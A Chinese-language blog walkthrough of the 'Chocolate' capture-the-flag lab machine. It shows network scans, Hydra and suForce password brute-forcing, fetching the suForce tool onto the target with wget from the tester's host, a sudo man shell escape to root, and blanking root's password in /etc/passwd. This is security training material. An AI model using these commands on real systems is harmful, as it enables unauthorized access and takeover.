Pepster'Blog
TheHackersLabs-Chocolate靶机详解WP
城南花已开 Lv5
  2025-01-08 19:30:47   2025-01-22 19:49:12    2k 字  11 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.147  08:00:27:f0:c7:e6       (Unknown)
192.168.60.254  00:50:56:e0:55:bd       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.949 seconds (131.35 hosts/sec). 4 responded
export ip=192.168.60.147
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
0day was here ♥

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.147:22
Open 192.168.60.147:21
Open 192.168.60.147:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 19:31 CST
Initiating ARP Ping Scan at 19:31
Scanning 192.168.60.147 [1 port]
Completed ARP Ping Scan at 19:31, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:31
Completed Parallel DNS resolution of 1 host. at 19:31, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:31
Scanning 192.168.60.147 [3 ports]
Discovered open port 22/tcp on 192.168.60.147
Discovered open port 21/tcp on 192.168.60.147
Discovered open port 80/tcp on 192.168.60.147
Completed SYN Stealth Scan at 19:31, 0.06s elapsed (3 total ports)
Nmap scan report for 192.168.60.147
Host is up, received arp-response (0.00046s latency).
Scanned at 2025-01-08 19:31:16 CST for 0s

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:F0:C7:E6 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

80端口开放,访问一下,默认的apache页面

扫一下目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.147
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/server-status        (Status: 403) [Size: 279]
/web                  (Status: 301) [Size: 314] [--> http://192.168.60.147/web/]
Progress: 4734 / 4735 (99.98%)
===============================================================
Finished
===============================================================

image

有个web目录给了个用户名bob,还有一些其他提示

去ftp看下有无信息,尝试利用匿名用户登录一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
❯ ftp anonymous@$ip
Connected to 192.168.60.147.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.
❯ ftp bob@$ip
Connected to 192.168.60.147.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed

Ftp爆破

发现都需要密码,那没办法了,只能无脑爆破了

拿到密码chocolate

1
2
3
4
5
6
7
8
9
❯ hydra -l bob -P /usr/share/wordlists/rockyou.txt ftp://$ip
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-08 19:36:40
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.60.147:21/
[21][ftp] host: 192.168.60.147   login: bob   password: chocolate
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-08 19:36:4

上去看下有什么东西,有个user读不了,还一个Shell脚本

先拿下来再说

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
❯ ftp bob@$ip
Connected to 192.168.60.147.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||21262|)
150 Here comes the directory listing.
-rw-r--r--    1 1001     1001          352 May 16  2024 limpieza.sh
-r--------    1 0        0              33 May 16  2024 user.txt
226 Directory send OK.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||63369|)
550 Failed to open file.
ftp> get limpieza.sh
local: limpieza.sh remote: limpieza.sh
229 Entering Extended Passive Mode (|||59392|)
150 Opening BINARY mode data connection for limpieza.sh (352 bytes).
100% |*********************************************************************************************************|   352      265.85 KiB/s    00:00 ETA
226 Transfer complete.
352 bytes received in 00:00 (129.42 KiB/s)
ftp>

看一下文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
cat limpieza.sh
#!/bin/bash

temp_directories=("/tmp" "/var/tmp" "/run/user/$UID")

file_patterns=("*.tmp" "*.temp" "*.bak" "*.swp")

echo "Eliminando archivos temporales..."

for dir in "${temp_directories[@]}"; do
    for pattern in "${file_patterns[@]}"; do
        find "$dir" -type f -name "$pattern" -delete
    done
done

echo "Archivos temporales eliminados."

遍历系统中的多个临时目录(/tmp/var/tmp 和与当前用户相关的临时目录)。

查找这些目录中匹配指定文件模式(.tmp.temp.bak.swp)的文件。

删除所有找到的匹配文件。

在开始和结束时分别打印提示信息。

正好印证了上面web获取的信息,自动清理程序

用户提权

但问题是我们咋拿到shell

同时发现这个ftp用户也可以登入上ssh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
❯ ssh bob@$ip
The authenticity of host '192.168.60.147 (192.168.60.147)' can't be established.
ED25519 key fingerprint is SHA256:d+b+JzmZGkN9nhLEz9cgbjCNit44x/YzVyQylzU82RQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.147' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux chocolate 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
bob@chocolate:~$ ls
limpieza.sh  user.txt
bob@chocolate:~$ cat user.txt
cat: user.txt: Permiso denegado

我们可以发现ftp的文件和这个用户的家目录一模一样

再次信息收集

发现还存在另一个用户secretote

1
2
3
4
5
6
7
8
9
10
bob@chocolate:~$ id
uid=1001(bob) gid=1001(bob) grupos=1001(bob),100(users)
bob@chocolate:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
……………………省略……………………
bob:x:1001:1001:bob,,,:/home/bob:/bin/bash
mongodb:x:103:65534::/nonexistent:/usr/sbin/nologin
secretote:x:1002:1002:secretote,,,:/home/secretote:/bin/bash

我这边直接使用suForce爆破一下,不想退出ssh了,只不过比较慢

拿到密码chocolate1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
bob@chocolate:/tmp$ wget 192.168.60.100/suForce
--2025-01-08 12:50:22--  http://192.168.60.100/suForce
Conectando con 192.168.60.100:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 2430 (2,4K) [application/octet-stream]
Grabando a: «suForce»

suForce                               100%[=======================================================================>]   2,37K  --.-KB/s    en 0s

2025-01-08 12:50:22 (256 MB/s) - «suForce» guardado [2430/2430]

bob@chocolate:/tmp$ wget 192.168.60.100/techyou.txt
--2025-01-08 12:50:34--  http://192.168.60.100/techyou.txt
Conectando con 192.168.60.100:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 161891 (158K) [text/plain]
Grabando a: «techyou.txt»

techyou.txt                           100%[=======================================================================>] 158,10K  --.-KB/s    en 0,007s

2025-01-08 12:50:34 (23,7 MB/s) - «techyou.txt» guardado [161891/161891]
bob@chocolate:/tmp$ ./suForce -u secretote -w techyou.txt
            _____
 ___ _   _ |  ___|__  _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| ||  _| (_) | | | (_|  __/
|___/\__,_||_|  \___/|_|  \___\___|
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | secretote
📖 Wordlist | techyou.txt
🔎 Status   | 1469/20000/7%/chocolate1
💥 Password | chocolate1
───────────────────────────────────

切换用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
bob@chocolate:/tmp$ su secretote
Contraseña:
secretote@chocolate:/tmp$ cd ~
secretote@chocolate:~$ ls -al
total 20
drwx------ 2 secretote secretote 4096 may 16  2024 .
drwxr-xr-x 5 root      root      4096 may 16  2024 ..
-rw-r--r-- 1 secretote secretote  220 may 16  2024 .bash_logout
-rw-r--r-- 1 secretote secretote 3526 may 16  2024 .bashrc
-rw-r--r-- 1 secretote secretote  807 may 16  2024 .profile
secretote@chocolate:~$ sudo -l
[sudo] contraseña para secretote:
Matching Defaults entries for secretote on chocolate:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User secretote may run the following commands on chocolate:
    (ALL : ALL) /usr/bin/man

Root提权

有个sudo权限可以执行man

那man提权不就完了

1
2
3
4
5
6
secretote@chocolate:~$ sudo /usr/bin/man man
!/bin/bash
root@chocolate:/home/secretote# id
uid=0(root) gid=0(root) grupos=0(root)
root@chocolate:/home/secretote# cat /root/root.txt
3e3fe08f2c9be56153e6e470199787c5

但有个问题为啥user读不了,我明明都是root了❓

1
2
root@chocolate:/home# cat /home/bob/user.txt
cat: /home/bob/user.txt: Permiso denegado

不懂,我直接把root的密码删除了,退出切换看一下

1
2
3
4
5
6
7
root@chocolate:/home# vi /etc/passwd
root::0:0:root:/root:/bin/bash		##删除x
secretote@chocolate:~$ su root
root@chocolate:/home/secretote# id
uid=0(root) gid=0(root) grupos=0(root)
root@chocolate:/home/secretote# cat /home/bob/user.txt
833558da8260cd75d29d311240fd21e0

这样就能读了

  1. 信息收集
    1. 服务探测
    2. Ftp爆破
  2. 用户提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 258.9k
  1. 信息收集
    1. 服务探测
    2. Ftp爆破
  2. 用户提权
  3. Root提权